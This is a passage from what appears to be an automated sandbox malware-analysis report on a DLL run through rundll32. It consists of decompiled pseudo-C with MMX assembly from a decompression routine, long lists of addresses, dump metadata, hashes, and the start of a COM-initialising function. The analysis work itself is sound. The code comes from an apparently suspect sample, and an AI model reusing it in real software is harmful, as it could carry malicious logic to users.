                                                                                                                                                                                                                								_t431 = _t431 + 0x20;
                                                                                                                                                                                                                								asm("por mm0, mm7");
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							asm("pand mm5, mm0");
                                                                                                                                                                                                                							asm("movd eax, mm5");
                                                                                                                                                                                                                							asm("movq mm5, mm2");
                                                                                                                                                                                                                							_t179 =  *(_t435[3] + _t178 * 4);
                                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                                								_t287 = _t179 & 0x000000ff;
                                                                                                                                                                                                                								_t253 = _t179 >> 0x10;
                                                                                                                                                                                                                								_t431 = _t431 - _t287;
                                                                                                                                                                                                                								asm("movd mm1, ecx");
                                                                                                                                                                                                                								if((_t179 & 0x00000010) != 0) {
                                                                                                                                                                                                                									break;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								if((_t179 & 0x00000040) != 0) {
                                                                                                                                                                                                                									goto L96;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								asm("psrlq mm0, mm1");
                                                                                                                                                                                                                								asm("movd ecx, mm0");
                                                                                                                                                                                                                								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001791c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t182 = _t179 & 0x0000000f;
                                                                                                                                                                                                                							if(_t182 == 0) {
                                                                                                                                                                                                                								if(_t253 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                                                                									L76:
                                                                                                                                                                                                                									_t435[0xb] = _t396;
                                                                                                                                                                                                                									_t184 = _t368 - _t435[0xa];
                                                                                                                                                                                                                									if(_t184 < _t253) {
                                                                                                                                                                                                                										_t185 = _t435[0xd];
                                                                                                                                                                                                                										_t291 =  ~_t184;
                                                                                                                                                                                                                										_t403 = _t435[0xe];
                                                                                                                                                                                                                										if(_t185 < _t253) {
                                                                                                                                                                                                                											goto L100;
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_t292 = _t291 + _t253;
                                                                                                                                                                                                                										if(_t435[0xc] != 0) {
                                                                                                                                                                                                                											_t186 = _t435[0xc];
                                                                                                                                                                                                                											if(_t292 <= _t186) {
                                                                                                                                                                                                                												_t405 = _t403 + _t186 - _t292;
                                                                                                                                                                                                                												if(_t349 > _t292) {
                                                                                                                                                                                                                													_t349 = _t349 - _t292;
                                                                                                                                                                                                                													memcpy(_t368, _t405, _t292);
                                                                                                                                                                                                                													_t435 =  &(_t435[3]);
                                                                                                                                                                                                                													_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                                                                													_t405 = _t368 - _t253;
                                                                                                                                                                                                                												}
                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
                                                                                                                                                                                                                												_t296 = _t292 - _t186;
                                                                                                                                                                                                                												if(_t349 > _t296) {
                                                                                                                                                                                                                													_t349 = _t349 - _t296;
                                                                                                                                                                                                                													memcpy(_t368, _t405, _t296);
                                                                                                                                                                                                                													_t435 =  &(_t435[3]);
                                                                                                                                                                                                                													_t368 = _t405 + _t296 + _t296;
                                                                                                                                                                                                                													_t405 = _t435[0xe];
                                                                                                                                                                                                                													_t298 = _t435[0xc];
                                                                                                                                                                                                                													if(_t349 > _t298) {
                                                                                                                                                                                                                														_t349 = _t349 - _t298;
                                                                                                                                                                                                                														memcpy(_t368, _t405, _t298);
                                                                                                                                                                                                                														_t435 =  &(_t435[3]);
                                                                                                                                                                                                                														_t368 = _t405 + _t298 + _t298;
                                                                                                                                                                                                                														_t405 = _t368 - _t253;
                                                                                                                                                                                                                													}
                                                                                                                                                                                                                												}
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                											_t405 = _t403 + _t185 - _t292;
                                                                                                                                                                                                                											if(_t349 > _t292) {
                                                                                                                                                                                                                												_t349 = _t349 - _t292;
                                                                                                                                                                                                                												memcpy(_t368, _t405, _t292);
                                                                                                                                                                                                                												_t435 =  &(_t435[3]);
                                                                                                                                                                                                                												_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                                                                												_t405 = _t368 - _t253;
                                                                                                                                                                                                                											}
                                                                                                                                                                                                                										}
                                                                                                                                                                                                                										_t293 = _t349;
                                                                                                                                                                                                                										_t172 = memcpy(_t368, _t405, _t293);
                                                                                                                                                                                                                										_t435 =  &(_t435[3]);
                                                                                                                                                                                                                										_t368 = _t405 + _t293 + _t293;
                                                                                                                                                                                                                										_t396 = _t435[0xb];
                                                                                                                                                                                                                										_t253 = _t435[2];
                                                                                                                                                                                                                										goto L64;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									_t412 = _t368 - _t253;
                                                                                                                                                                                                                									_t302 = _t349 - 3;
                                                                                                                                                                                                                									 *_t368 =  *_t412;
                                                                                                                                                                                                                									_t413 = _t412 + 3;
                                                                                                                                                                                                                									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
                                                                                                                                                                                                                									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
                                                                                                                                                                                                                									_t172 = memcpy(_t368 + 3, _t413, _t302);
                                                                                                                                                                                                                									_t435 =  &(_t435[3]);
                                                                                                                                                                                                                									_t368 = _t413 + _t302 + _t302;
                                                                                                                                                                                                                									_t396 = _t435[0xb];
                                                                                                                                                                                                                									_t253 = _t435[2];
                                                                                                                                                                                                                									goto L64;
                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                									_t380 = _t368 - 1;
                                                                                                                                                                                                                									_t194 =  *_t380;
                                                                                                                                                                                                                									_t305 = _t349 - 3;
                                                                                                                                                                                                                									 *(_t380 + 1) = _t194;
                                                                                                                                                                                                                									 *(_t380 + 2) = _t194;
                                                                                                                                                                                                                									 *(_t380 + 3) = _t194;
                                                                                                                                                                                                                									_t381 = _t380 + 4;
                                                                                                                                                                                                                									_t172 = memset(_t381, _t194, _t305 << 0);
                                                                                                                                                                                                                									_t435 =  &(_t435[3]);
                                                                                                                                                                                                                									_t368 = _t381 + _t305;
                                                                                                                                                                                                                									_t253 = _t435[2];
                                                                                                                                                                                                                									L64:
                                                                                                                                                                                                                									if(_t435[4] <= _t368) {
                                                                                                                                                                                                                										goto L104;
                                                                                                                                                                                                                									}
                                                                                                                                                                                                                									goto L65;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							asm("psrlq mm0, mm1");
                                                                                                                                                                                                                							asm("movd mm1, eax");
                                                                                                                                                                                                                							asm("movd ecx, mm0");
                                                                                                                                                                                                                							_t431 = _t431 - _t182;
                                                                                                                                                                                                                							_t253 = _t253 + (_t287 &  *(0x1001791c + _t182 * 4));
                                                                                                                                                                                                                							goto L76;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t172 = _t173 >> 0x10;
                                                                                                                                                                                                                						asm("stosb");
                                                                                                                                                                                                                						goto L64;
                                                                                                                                                                                                                						L65:
                                                                                                                                                                                                                					} while (_t435[5] > _t396);
                                                                                                                                                                                                                					goto L104;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}




























































































                                                                                                                                                                                                                0x1001799f
                                                                                                                                                                                                                0x100179a4
                                                                                                                                                                                                                0x100179a5
                                                                                                                                                                                                                0x100179a8
                                                                                                                                                                                                                0x100179a9
                                                                                                                                                                                                                0x100179ad
                                                                                                                                                                                                                0x100179b3
                                                                                                                                                                                                                0x100179ba
                                                                                                                                                                                                                0x100179be
                                                                                                                                                                                                                0x100179c6
                                                                                                                                                                                                                0x100179c9
                                                                                                                                                                                                                0x100179da
                                                                                                                                                                                                                0x100179de
                                                                                                                                                                                                                0x100179e2
                                                                                                                                                                                                                0x100179ec
                                                                                                                                                                                                                0x100179f0
                                                                                                                                                                                                                0x100179ff
                                                                                                                                                                                                                0x10017a0d
                                                                                                                                                                                                                0x10017a11
                                                                                                                                                                                                                0x10017a17
                                                                                                                                                                                                                0x10017a1a
                                                                                                                                                                                                                0x10017a1e
                                                                                                                                                                                                                0x10017a22
                                                                                                                                                                                                                0x10017a26
                                                                                                                                                                                                                0x10017a29
                                                                                                                                                                                                                0x10017a2c
                                                                                                                                                                                                                0x10017a30
                                                                                                                                                                                                                0x10017a36
                                                                                                                                                                                                                0x10017a5a
                                                                                                                                                                                                                0x10017a60
                                                                                                                                                                                                                0x10017a66
                                                                                                                                                                                                                0x10017a67
                                                                                                                                                                                                                0x10017a69
                                                                                                                                                                                                                0x10017a6c
                                                                                                                                                                                                                0x10017a6e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017a6e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017a38
                                                                                                                                                                                                                0x10017a3b
                                                                                                                                                                                                                0x10017a4e
                                                                                                                                                                                                                0x10017a4e
                                                                                                                                                                                                                0x10017a4e
                                                                                                                                                                                                                0x10017a50
                                                                                                                                                                                                                0x10017a54
                                                                                                                                                                                                                0x10017a72
                                                                                                                                                                                                                0x10017a72
                                                                                                                                                                                                                0x10017a76
                                                                                                                                                                                                                0x10017a76
                                                                                                                                                                                                                0x10017a7d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017a83
                                                                                                                                                                                                                0x10017af0
                                                                                                                                                                                                                0x10017af3
                                                                                                                                                                                                                0x10017af7
                                                                                                                                                                                                                0x10017af9
                                                                                                                                                                                                                0x10017afb
                                                                                                                                                                                                                0x10017b00
                                                                                                                                                                                                                0x10017b00
                                                                                                                                                                                                                0x10017b0b
                                                                                                                                                                                                                0x10017b0e
                                                                                                                                                                                                                0x10017b10
                                                                                                                                                                                                                0x10017b12
                                                                                                                                                                                                                0x10017b16
                                                                                                                                                                                                                0x10017b1b
                                                                                                                                                                                                                0x10017b1b
                                                                                                                                                                                                                0x10017b1b
                                                                                                                                                                                                                0x10017b33
                                                                                                                                                                                                                0x10017b36
                                                                                                                                                                                                                0x10017b3a
                                                                                                                                                                                                                0x10017c36
                                                                                                                                                                                                                0x10017f4a
                                                                                                                                                                                                                0x10017f4c
                                                                                                                                                                                                                0x10017f5a
                                                                                                                                                                                                                0x10017f5f
                                                                                                                                                                                                                0x10017f4e
                                                                                                                                                                                                                0x10017f4e
                                                                                                                                                                                                                0x10017f53
                                                                                                                                                                                                                0x10017f53
                                                                                                                                                                                                                0x10017f76
                                                                                                                                                                                                                0x10017f76
                                                                                                                                                                                                                0x10017f7c
                                                                                                                                                                                                                0x10017f7e
                                                                                                                                                                                                                0x10017f7e
                                                                                                                                                                                                                0x10017f84
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017f84
                                                                                                                                                                                                                0x10017c4c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017c4c
                                                                                                                                                                                                                0x10017b40
                                                                                                                                                                                                                0x10017b43
                                                                                                                                                                                                                0x10017b47
                                                                                                                                                                                                                0x10017b4d
                                                                                                                                                                                                                0x10017b4f
                                                                                                                                                                                                                0x10017b51
                                                                                                                                                                                                                0x10017b56
                                                                                                                                                                                                                0x10017b58
                                                                                                                                                                                                                0x10017b58
                                                                                                                                                                                                                0x10017b62
                                                                                                                                                                                                                0x10017b64
                                                                                                                                                                                                                0x10017b66
                                                                                                                                                                                                                0x10017b68
                                                                                                                                                                                                                0x10017b68
                                                                                                                                                                                                                0x10017b6a
                                                                                                                                                                                                                0x10017b71
                                                                                                                                                                                                                0x10017b75
                                                                                                                                                                                                                0x10017b77
                                                                                                                                                                                                                0x10017b79
                                                                                                                                                                                                                0x10017b7e
                                                                                                                                                                                                                0x10017b7e
                                                                                                                                                                                                                0x10017b8a
                                                                                                                                                                                                                0x10017b8d
                                                                                                                                                                                                                0x10017b8f
                                                                                                                                                                                                                0x10017b94
                                                                                                                                                                                                                0x10017b96
                                                                                                                                                                                                                0x10017b98
                                                                                                                                                                                                                0x10017b9c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017c56
                                                                                                                                                                                                                0x10017f3e
                                                                                                                                                                                                                0x10017f3e
                                                                                                                                                                                                                0x10017f43
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017f43
                                                                                                                                                                                                                0x10017c6c
                                                                                                                                                                                                                0x10017c6c
                                                                                                                                                                                                                0x10017ba2
                                                                                                                                                                                                                0x10017ba5
                                                                                                                                                                                                                0x10017c0f
                                                                                                                                                                                                                0x10017bce
                                                                                                                                                                                                                0x10017bce
                                                                                                                                                                                                                0x10017bd4
                                                                                                                                                                                                                0x10017bda
                                                                                                                                                                                                                0x10017c76
                                                                                                                                                                                                                0x10017c7a
                                                                                                                                                                                                                0x10017c7c
                                                                                                                                                                                                                0x10017c82
                                                                                                                                                                                                                0x10017f66
                                                                                                                                                                                                                0x10017f66
                                                                                                                                                                                                                0x10017f6a
                                                                                                                                                                                                                0x10017f6f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017f6f
                                                                                                                                                                                                                0x10017c88
                                                                                                                                                                                                                0x10017c8f
                                                                                                                                                                                                                0x10017cb5
                                                                                                                                                                                                                0x10017cbb
                                                                                                                                                                                                                0x10017ceb
                                                                                                                                                                                                                0x10017ced
                                                                                                                                                                                                                0x10017cf3
                                                                                                                                                                                                                0x10017cf7
                                                                                                                                                                                                                0x10017cf7
                                                                                                                                                                                                                0x10017cf7
                                                                                                                                                                                                                0x10017cfb
                                                                                                                                                                                                                0x10017cfb
                                                                                                                                                                                                                0x10017cbd
                                                                                                                                                                                                                0x10017cc3
                                                                                                                                                                                                                0x10017cc5
                                                                                                                                                                                                                0x10017cc7
                                                                                                                                                                                                                0x10017ccd
                                                                                                                                                                                                                0x10017cd1
                                                                                                                                                                                                                0x10017cd1
                                                                                                                                                                                                                0x10017cd1
                                                                                                                                                                                                                0x10017cd3
                                                                                                                                                                                                                0x10017cd7
                                                                                                                                                                                                                0x10017cdd
                                                                                                                                                                                                                0x10017ce1
                                                                                                                                                                                                                0x10017ce1
                                                                                                                                                                                                                0x10017ce1
                                                                                                                                                                                                                0x10017ce5
                                                                                                                                                                                                                0x10017ce5
                                                                                                                                                                                                                0x10017cdd
                                                                                                                                                                                                                0x10017ccd
                                                                                                                                                                                                                0x10017c91
                                                                                                                                                                                                                0x10017c93
                                                                                                                                                                                                                0x10017c95
                                                                                                                                                                                                                0x10017c9b
                                                                                                                                                                                                                0x10017c9f
                                                                                                                                                                                                                0x10017c9f
                                                                                                                                                                                                                0x10017c9f
                                                                                                                                                                                                                0x10017ca3
                                                                                                                                                                                                                0x10017ca3
                                                                                                                                                                                                                0x10017c9b
                                                                                                                                                                                                                0x10017cfd
                                                                                                                                                                                                                0x10017cff
                                                                                                                                                                                                                0x10017cff
                                                                                                                                                                                                                0x10017cff
                                                                                                                                                                                                                0x10017d01
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017d01
                                                                                                                                                                                                                0x10017be6
                                                                                                                                                                                                                0x10017be8
                                                                                                                                                                                                                0x10017bed
                                                                                                                                                                                                                0x10017bf5
                                                                                                                                                                                                                0x10017bf8
                                                                                                                                                                                                                0x10017bfb
                                                                                                                                                                                                                0x10017c01
                                                                                                                                                                                                                0x10017c01
                                                                                                                                                                                                                0x10017c01
                                                                                                                                                                                                                0x10017c03
                                                                                                                                                                                                                0x10017c17
                                                                                                                                                                                                                0x10017c17
                                                                                                                                                                                                                0x10017c1c
                                                                                                                                                                                                                0x10017c1e
                                                                                                                                                                                                                0x10017c21
                                                                                                                                                                                                                0x10017c24
                                                                                                                                                                                                                0x10017c27
                                                                                                                                                                                                                0x10017c2a
                                                                                                                                                                                                                0x10017c2d
                                                                                                                                                                                                                0x10017c2d
                                                                                                                                                                                                                0x10017c2d
                                                                                                                                                                                                                0x10017c2d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017c0f
                                                                                                                                                                                                                0x10017ba9
                                                                                                                                                                                                                0x10017baf
                                                                                                                                                                                                                0x10017bb1
                                                                                                                                                                                                                0x10017bb3
                                                                                                                                                                                                                0x10017bb8
                                                                                                                                                                                                                0x10017bba
                                                                                                                                                                                                                0x10017bba
                                                                                                                                                                                                                0x10017bc4
                                                                                                                                                                                                                0x10017bc6
                                                                                                                                                                                                                0x10017bc8
                                                                                                                                                                                                                0x10017bca
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017bca
                                                                                                                                                                                                                0x10017b1c
                                                                                                                                                                                                                0x10017b1c
                                                                                                                                                                                                                0x10017f88
                                                                                                                                                                                                                0x10017f8f
                                                                                                                                                                                                                0x10017f91
                                                                                                                                                                                                                0x10017f91
                                                                                                                                                                                                                0x10017f93
                                                                                                                                                                                                                0x10017f99
                                                                                                                                                                                                                0x10017f9c
                                                                                                                                                                                                                0x10017f9f
                                                                                                                                                                                                                0x10017fa4
                                                                                                                                                                                                                0x10017fa6
                                                                                                                                                                                                                0x10017fa9
                                                                                                                                                                                                                0x10017fac
                                                                                                                                                                                                                0x10017fae
                                                                                                                                                                                                                0x10017fb6
                                                                                                                                                                                                                0x10017fba
                                                                                                                                                                                                                0x10017fbc
                                                                                                                                                                                                                0x10017fc0
                                                                                                                                                                                                                0x10017fc8
                                                                                                                                                                                                                0x10017fc8
                                                                                                                                                                                                                0x10017fcc
                                                                                                                                                                                                                0x10017fd5
                                                                                                                                                                                                                0x10017fdd
                                                                                                                                                                                                                0x10017fdf
                                                                                                                                                                                                                0x10017fe2
                                                                                                                                                                                                                0x10017fe5
                                                                                                                                                                                                                0x10017fe5
                                                                                                                                                                                                                0x10017fe9
                                                                                                                                                                                                                0x10017fec
                                                                                                                                                                                                                0x10017ff2
                                                                                                                                                                                                                0x10018005
                                                                                                                                                                                                                0x10017ff4
                                                                                                                                                                                                                0x10017ff9
                                                                                                                                                                                                                0x10017ff9
                                                                                                                                                                                                                0x10018008
                                                                                                                                                                                                                0x1001800e
                                                                                                                                                                                                                0x10018027
                                                                                                                                                                                                                0x10018010
                                                                                                                                                                                                                0x10018018
                                                                                                                                                                                                                0x10018018
                                                                                                                                                                                                                0x1001802d
                                                                                                                                                                                                                0x10018032
                                                                                                                                                                                                                0x10018032
                                                                                                                                                                                                                0x10017a85
                                                                                                                                                                                                                0x10017a86
                                                                                                                                                                                                                0x10017a87
                                                                                                                                                                                                                0x10017a88
                                                                                                                                                                                                                0x10017a89
                                                                                                                                                                                                                0x10017a8d
                                                                                                                                                                                                                0x10017a94
                                                                                                                                                                                                                0x10017a95
                                                                                                                                                                                                                0x10017a96
                                                                                                                                                                                                                0x10017a97
                                                                                                                                                                                                                0x10017a99
                                                                                                                                                                                                                0x10017adf
                                                                                                                                                                                                                0x10017adf
                                                                                                                                                                                                                0x10017ae9
                                                                                                                                                                                                                0x10017ae9
                                                                                                                                                                                                                0x10017aea
                                                                                                                                                                                                                0x10017aeb
                                                                                                                                                                                                                0x10017aec
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017aec
                                                                                                                                                                                                                0x10017a9d
                                                                                                                                                                                                                0x10017aa5
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017ab7
                                                                                                                                                                                                                0x10017abc
                                                                                                                                                                                                                0x10017ac7
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017ad3
                                                                                                                                                                                                                0x10017ad3
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017ad3
                                                                                                                                                                                                                0x10017ac7
                                                                                                                                                                                                                0x10017aa5
                                                                                                                                                                                                                0x10017d0c
                                                                                                                                                                                                                0x10017d0e
                                                                                                                                                                                                                0x10017d11
                                                                                                                                                                                                                0x10017d13
                                                                                                                                                                                                                0x10017d17
                                                                                                                                                                                                                0x10017d1a
                                                                                                                                                                                                                0x10017d1f
                                                                                                                                                                                                                0x10017d22
                                                                                                                                                                                                                0x10017d25
                                                                                                                                                                                                                0x10017d2c
                                                                                                                                                                                                                0x10017d2c
                                                                                                                                                                                                                0x10017d32
                                                                                                                                                                                                                0x10017d34
                                                                                                                                                                                                                0x10017d37
                                                                                                                                                                                                                0x10017d3a
                                                                                                                                                                                                                0x10017d3d
                                                                                                                                                                                                                0x10017d40
                                                                                                                                                                                                                0x10017d43
                                                                                                                                                                                                                0x10017d43
                                                                                                                                                                                                                0x10017d46
                                                                                                                                                                                                                0x10017d49
                                                                                                                                                                                                                0x10017d4c
                                                                                                                                                                                                                0x10017d4f
                                                                                                                                                                                                                0x10017d52
                                                                                                                                                                                                                0x10017d52
                                                                                                                                                                                                                0x10017d55
                                                                                                                                                                                                                0x10017d58
                                                                                                                                                                                                                0x10017d5c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017d79
                                                                                                                                                                                                                0x10017d7e
                                                                                                                                                                                                                0x10017e66
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017e6f
                                                                                                                                                                                                                0x10017e72
                                                                                                                                                                                                                0x10017e7e
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017e7e
                                                                                                                                                                                                                0x10017d84
                                                                                                                                                                                                                0x10017d87
                                                                                                                                                                                                                0x10017d89
                                                                                                                                                                                                                0x10017d8c
                                                                                                                                                                                                                0x10017d8f
                                                                                                                                                                                                                0x10017d92
                                                                                                                                                                                                                0x10017d9b
                                                                                                                                                                                                                0x10017d9b
                                                                                                                                                                                                                0x10017d9d
                                                                                                                                                                                                                0x10017da3
                                                                                                                                                                                                                0x10017da5
                                                                                                                                                                                                                0x10017da8
                                                                                                                                                                                                                0x10017dab
                                                                                                                                                                                                                0x10017dae
                                                                                                                                                                                                                0x10017db1
                                                                                                                                                                                                                0x10017db4
                                                                                                                                                                                                                0x10017db4
                                                                                                                                                                                                                0x10017dbb
                                                                                                                                                                                                                0x10017dbe
                                                                                                                                                                                                                0x10017dc1
                                                                                                                                                                                                                0x10017dc4
                                                                                                                                                                                                                0x10017dc7
                                                                                                                                                                                                                0x10017dc7
                                                                                                                                                                                                                0x10017dcc
                                                                                                                                                                                                                0x10017dcf
                                                                                                                                                                                                                0x10017dd1
                                                                                                                                                                                                                0x10017dd6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017e8a
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017e93
                                                                                                                                                                                                                0x10017e96
                                                                                                                                                                                                                0x10017ea6
                                                                                                                                                                                                                0x10017ea6
                                                                                                                                                                                                                0x10017ddc
                                                                                                                                                                                                                0x10017ddf
                                                                                                                                                                                                                0x10017e3b
                                                                                                                                                                                                                0x10017df5
                                                                                                                                                                                                                0x10017df5
                                                                                                                                                                                                                0x10017dfb
                                                                                                                                                                                                                0x10017e01
                                                                                                                                                                                                                0x10017eb2
                                                                                                                                                                                                                0x10017eb6
                                                                                                                                                                                                                0x10017eb8
                                                                                                                                                                                                                0x10017ebe
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017ec4
                                                                                                                                                                                                                0x10017ecb
                                                                                                                                                                                                                0x10017eed
                                                                                                                                                                                                                0x10017ef3
                                                                                                                                                                                                                0x10017f1f
                                                                                                                                                                                                                0x10017f23
                                                                                                                                                                                                                0x10017f25
                                                                                                                                                                                                                0x10017f27
                                                                                                                                                                                                                0x10017f27
                                                                                                                                                                                                                0x10017f27
                                                                                                                                                                                                                0x10017f2b
                                                                                                                                                                                                                0x10017f2b
                                                                                                                                                                                                                0x10017ef5
                                                                                                                                                                                                                0x10017efb
                                                                                                                                                                                                                0x10017efd
                                                                                                                                                                                                                0x10017f01
                                                                                                                                                                                                                0x10017f03
                                                                                                                                                                                                                0x10017f05
                                                                                                                                                                                                                0x10017f05
                                                                                                                                                                                                                0x10017f05
                                                                                                                                                                                                                0x10017f07
                                                                                                                                                                                                                0x10017f0b
                                                                                                                                                                                                                0x10017f11
                                                                                                                                                                                                                0x10017f13
                                                                                                                                                                                                                0x10017f15
                                                                                                                                                                                                                0x10017f15
                                                                                                                                                                                                                0x10017f15
                                                                                                                                                                                                                0x10017f19
                                                                                                                                                                                                                0x10017f19
                                                                                                                                                                                                                0x10017f11
                                                                                                                                                                                                                0x10017f01
                                                                                                                                                                                                                0x10017ecd
                                                                                                                                                                                                                0x10017ecf
                                                                                                                                                                                                                0x10017ed3
                                                                                                                                                                                                                0x10017ed5
                                                                                                                                                                                                                0x10017ed7
                                                                                                                                                                                                                0x10017ed7
                                                                                                                                                                                                                0x10017ed7
                                                                                                                                                                                                                0x10017edb
                                                                                                                                                                                                                0x10017edb
                                                                                                                                                                                                                0x10017ed3
                                                                                                                                                                                                                0x10017f2d
                                                                                                                                                                                                                0x10017f2f
                                                                                                                                                                                                                0x10017f2f
                                                                                                                                                                                                                0x10017f2f
                                                                                                                                                                                                                0x10017f31
                                                                                                                                                                                                                0x10017f35
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017f35
                                                                                                                                                                                                                0x10017e0b
                                                                                                                                                                                                                0x10017e0d
                                                                                                                                                                                                                0x10017e12
                                                                                                                                                                                                                0x10017e1a
                                                                                                                                                                                                                0x10017e1d
                                                                                                                                                                                                                0x10017e20
                                                                                                                                                                                                                0x10017e26
                                                                                                                                                                                                                0x10017e26
                                                                                                                                                                                                                0x10017e26
                                                                                                                                                                                                                0x10017e28
                                                                                                                                                                                                                0x10017e2c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017e43
                                                                                                                                                                                                                0x10017e43
                                                                                                                                                                                                                0x10017e46
                                                                                                                                                                                                                0x10017e48
                                                                                                                                                                                                                0x10017e4b
                                                                                                                                                                                                                0x10017e4e
                                                                                                                                                                                                                0x10017e51
                                                                                                                                                                                                                0x10017e54
                                                                                                                                                                                                                0x10017e57
                                                                                                                                                                                                                0x10017e57
                                                                                                                                                                                                                0x10017e57
                                                                                                                                                                                                                0x10017e59
                                                                                                                                                                                                                0x10017d62
                                                                                                                                                                                                                0x10017d66
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017d66
                                                                                                                                                                                                                0x10017e3b
                                                                                                                                                                                                                0x10017de1
                                                                                                                                                                                                                0x10017de4
                                                                                                                                                                                                                0x10017de7
                                                                                                                                                                                                                0x10017dea
                                                                                                                                                                                                                0x10017df3
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017df3
                                                                                                                                                                                                                0x10017d5e
                                                                                                                                                                                                                0x10017d61
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017d6c
                                                                                                                                                                                                                0x10017d6c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10017d72

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                                                                • API String ID: 0-3089872807
                                                                                                                                                                                                                • Opcode ID: 891c31732df7ee9c86fe88bae22decff034309e3cafc24a05e2a0713e93e6e3b
                                                                                                                                                                                                                • Instruction ID: 5938c8f960f2e2343e4500dd64128025537aebf860d0862d27eb1a5e10829eca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 891c31732df7ee9c86fe88bae22decff034309e3cafc24a05e2a0713e93e6e3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3121532A083468FD715DE38C49021ABBF1FF88394F558A2CE8999BB41D771ED89C781
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 30%
                                                                                                                                                                                                                			E1000D972(void* __ecx) {
                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                                				intOrPtr* _t16;
                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                                				intOrPtr* _t24;
                                                                                                                                                                                                                				intOrPtr* _t25;
                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                                                				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                                                				_t15 =  &_v12;
                                                                                                                                                                                                                				__imp__CoCreateInstance(0x1001d928, 0, 1, 0x1001d938, _t15);
                                                                                                                                                                                                                				if(_t15 < 0) {
